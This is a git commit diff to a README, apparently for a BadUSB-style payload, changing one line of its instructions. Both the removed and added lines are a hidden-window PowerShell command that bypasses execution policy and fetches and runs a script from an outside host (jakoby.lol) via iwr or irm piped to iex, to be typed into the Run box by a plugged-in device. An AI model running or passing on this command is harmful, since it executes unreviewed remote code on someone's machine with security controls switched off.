Update Readme.md

This commit is contained in:
I-Am-Jakoby 2023-01-01 17:17:35 -06:00 committed by GitHub
parent 325f041f3d
commit bf1cafc98c
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -45,7 +45,7 @@ Each URL will be passed through the subscribe function.
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
```
powershell -w h -NoP -NonI -Ep Bypass iwr jakoby.lol/14q | iex
powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/14q | iex
```
<p align="right">(<a href="#top">back to top</a>)</p>